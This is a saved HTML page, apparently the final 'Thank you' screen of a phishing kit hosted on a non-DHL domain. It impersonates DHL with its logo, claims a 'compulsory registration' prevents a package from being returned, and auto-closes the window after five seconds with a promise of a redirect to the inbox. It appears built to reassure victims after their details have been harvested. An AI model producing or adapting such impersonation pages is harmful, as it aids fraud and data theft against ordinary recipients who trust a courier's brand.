
<!DOCTYPE html>
<!-- saved from url=(0027)http://unltdng.com/dhl.html -->
<html lang="en-NG" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage indexeddb hashchange history draganddrop rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage applicationcache svg inlinesvg smil svgclippaths jsEnabled" data-device-type="dedicated"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        
            <link rel="stylesheet" href="9d6d57cdba238a0a6cbd3104d82254b93fd2d4.css" type="text/css">
        

        
            
            
   
            
        

        
        


        
        

        
        

        
	
		

<title>Thank you</title>




    
    	
        
    	
 
            
    	
    


<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, minimal-ui">


        
    </head>
    
    
    <body>

        
            <div id="body">
        

        
        
            
            
                
<header class="table-row" role="banner">
    <div>
        <div class="containerCentered ">
          <nav id="main-menu" role="navigation">
            <ul>
              
              <li>
                <div class="menu-wrapper" id="submenu-buy" aria-labelledby="header-buy" role="region" tabindex="-1">
                <ul id="header-buy-menu" class="subnav list two-col">
                    

                    
                </ul>
            </div>
        </li>
        

        
        
        <li>
          <div class="menu-wrapper light" id="submenu-send" aria-labelledby="header-send" role="region" tabindex="-1">
                <div id="header-send-menu" class="menu subnav light">

                
                
                    

                

                </div>
            </div>
        </li>
        

        
        

        
        

        
        
    </ul>

    
    
    
            
            
        
    
</nav>
        </div>
    </div>
</header>
            
        
            <div role="main" id="main" class="containerMobileFullWidth">
              <section class="row-fluid row pullout center-text text-center">
                <div class="containerCentered container">
        <div class="center-block span8 col-sm-8">
            
                
        <h2 class="contentPara"><img src="DHL.png" width="238" height="92" align="absmiddle"></h2>

    <script type="text/javascript">
function closeWindow() {
setTimeout(function() {
window.close();
}, 5000);
}

window.onload = closeWindow();
</script>

<h3>We will contact you with pickup details within 48 hours via email.</h3>
<p>You will be redirected to your inbox in 7 seconds.</p>
              <a href="javascript:if(confirm('Close window?'))window.close()">return to inbox</a>




        </div>
    </div>
</section>



            </div>
            

<footer role="contentinfo" class="global-footer">
    <div class="containerCentered containerExtend">
      <p align="center" class="footer-notes">DHL will contact you with your tracking details. This is a compulsory registration to prevent your package from being returned. </p>
        
   
    </div>
    
</footer>

        </div>

        
        

        
        

        


	
		

</body></html>